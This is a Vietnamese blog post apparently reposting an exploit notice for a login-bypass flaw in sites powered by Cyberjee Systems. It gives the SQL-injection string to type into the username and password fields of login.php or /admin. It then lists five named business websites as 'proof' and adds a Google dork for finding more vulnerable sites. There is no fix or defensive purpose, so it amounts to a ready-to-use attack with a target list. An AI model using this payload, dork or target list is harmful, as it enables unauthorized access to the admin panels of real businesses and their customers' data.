Powered by Cyberjee Bypass Login Page Vulnerability

# Exploit : Login page bypass
#
# Location : [Target]/login.php Location 2 : [Target]/admin
#
# Username : '=' 'or'
#
# Password : '=' 'or'
######################
# Proof:
#
# http://www.dumarsgrill.com/admin/index.php
#
# http://www.tripplesperfumes.com/login.php
#
# http://johnnyswatches.com/admin/
#
# http://www.timefactoryinc.com/admin/admin_panel.php
#
# http://www.blakesbarbq.biz/admin/index.php
#
#
#
# Google Dork : intext:"Powered by Cyberjee Systems, Inc"
######################

Chú Ý:

Coppy phải ghi rõ nguồn Dương-UG Blog's
 

0 nhận xét:

Đăng nhận xét

:) :( :)) :(( =))

Copyright © Dương-UG Blog's - Nguyễn Bình Dương